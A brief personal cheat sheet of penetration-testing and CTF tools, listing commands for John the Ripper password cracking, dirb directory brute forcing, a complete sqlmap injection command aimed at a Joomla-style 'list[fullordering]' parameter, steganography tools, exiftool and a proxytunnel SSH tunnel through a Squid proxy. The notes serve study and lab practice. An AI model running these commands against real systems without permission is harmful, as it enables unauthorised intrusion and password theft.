Tulz
John the Ripper: john hashfile.txt ~~password cracking
DirBuster: dirb http://192.168.1.5 ~~brute force directories
sqlmap: ~~SQL injection
Using Sqlmap: sqlmap -u "http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
The above command lists databases (--dbs)
Burp Suite ~~intercept client & server communication
~~ Steganography ~~
steghide: steghide extract -sf picture.jpg ~~to extract from jpeg
steghide embed -cf picture.jpg -ef secret.txt ~~To embed in jpeg
stegsolve: java -jar stegsolve.jar (to run) ~~to check a particular image for a password by using different layers
exiftool: To extract metadata
exiftool <file.png>
exiftool -h Tux.png > Tux.html ~~To export to file
Setting Squid proxy (Proxytunnel): sudo proxytunnel -p 192.168.43.158:3128 -d 127.0.0.1:22 -a 2121 (-p final destination, -d we type in ssh, -a the port we give in ssh)